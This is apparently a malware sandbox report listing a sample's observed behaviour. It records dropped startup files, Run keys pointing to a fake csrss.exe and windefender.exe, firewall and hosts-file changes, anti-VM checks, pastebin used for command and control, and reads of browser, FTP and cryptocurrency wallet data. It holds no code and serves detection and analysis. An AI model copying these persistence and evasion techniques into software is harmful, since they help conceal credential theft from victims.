| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\Pictures\7M1vzKcmqz14mInY2i7DMkSN.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\D1D3.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PhLNEiMMkHhTuEAWa0tSdnqU.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tKC48c8ac1EBKI3opJ5mVqn8.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6rOswOLbM3ka3GTmOhcT01vT.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSVYxUE6I4G8At3DTo4PgsYG.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WTYgYgUjQAF6geJ0zGfUzKm8.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2HahSoNu44K8VcptuIjYkrA7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-H67FP.tmp\gpWNVqLsEDtZirSl0AU2v7YV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Opm5lGu8UrvwdUGjPjpOVyNv.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Opm5lGu8UrvwdUGjPjpOVyNv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 141.98.234.31 | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\77ebaece-228d-4626-873d-85c1fcd89c02\\D1D3.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\D1D3.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\Pictures\7M1vzKcmqz14mInY2i7DMkSN.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\D1D3.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Z1JYCcVn4hUQyrOX4S18vo6O.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Z1JYCcVn4hUQyrOX4S18vo6O.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Z1JYCcVn4hUQyrOX4S18vo6O.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2322 = "Sakhalin Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2452 = "Saint Pierre Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-H67FP.tmp\gpWNVqLsEDtZirSl0AU2v7YV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-H67FP.tmp\gpWNVqLsEDtZirSl0AU2v7YV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Z1JYCcVn4hUQyrOX4S18vo6O.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Z1JYCcVn4hUQyrOX4S18vo6O.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\Z1JYCcVn4hUQyrOX4S18vo6O.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\Pictures\vDTUm7FUB8B0uP3CNWmcvidM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
